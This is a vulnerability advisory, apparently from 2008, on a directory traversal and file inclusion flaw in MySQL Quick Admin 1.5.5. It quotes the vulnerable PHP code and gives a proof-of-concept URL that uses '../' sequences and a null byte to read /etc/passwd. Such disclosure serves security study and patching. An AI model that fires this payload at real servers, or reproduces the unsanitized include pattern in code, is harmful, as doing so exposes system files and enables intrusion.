##################################################################################
#                     #    
#    Author:  Vinod Sharma             #
#    Email:  vinodsharma.mimit@gmail.com         #
#    Date:  05th Nov, 2008             #
#    Note:   This information is only for educational purpose, author # 
#      will not bear responsibility for any damages.      #
##################################################################################


#########################################################################################
#Directory traversal vulnerability in MySQL Quick Admin 1.5.5         #
#allows remote attackers to read and execute arbitrary files via a .. (dot dot)   #
#in the lang parameter to actions.php.              #
#                      #
#                      #
#                      #
#Appplication still unpatched                #
#                      #
#vulnerable code in actions.php                #
#                       #        
#/* code start                    #
#    case 27:                    #
#         $do = $_GET['do'];                #
#         if($do == "theme" && file_exists("themes/".$_GET['theme'])){      #
#             setcookie('theme', $_GET['theme'], time()+60*60*24*30);      #
#             $_SESSION['theme'] = $_GET['theme'];          #
#             unset($_SESSION['theme_name']);            #
#         } else if($do == "lang" && file_exists("lang/".$_GET['lang'])){    #
#             setcookie('language', $_GET['lang'], time()+60*60*24*30);      #
#             $_SESSION['language'] = $_GET['lang'];          #
#             unset($_SESSION['lang_name']);            #
#         }                    #
#         header("Location: main.php");              #
#                      #
#/* code end                    #
#                      #  
#$_SESSION['language'] is set to the value of the lang parameter without any     #
#sanitization.                    #
#                      #
#The actions.php will send this $_SESSION['language'] value to required.php which will   #
#pass it to include() function without any sanitization.         #
#                      #
#                      #
#vulnerable code in required.php              #
#                      #
#/* code start                     #
#                      #
#line 22 in required.php:  include("lang/".$_SESSION['language']."/lang.php");    #      
#                      #
#/* code end                    #
#########################################################################################


POC:http://www.example.com/quickadmin/actions.php?act=27&do=lang&lang=../../../../../../../../../../etc/passwd%00


#########################################################################################
#  references:                  #
#  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4454      #
#  http://secunia.com/advisories/31820            #
#########################################################################################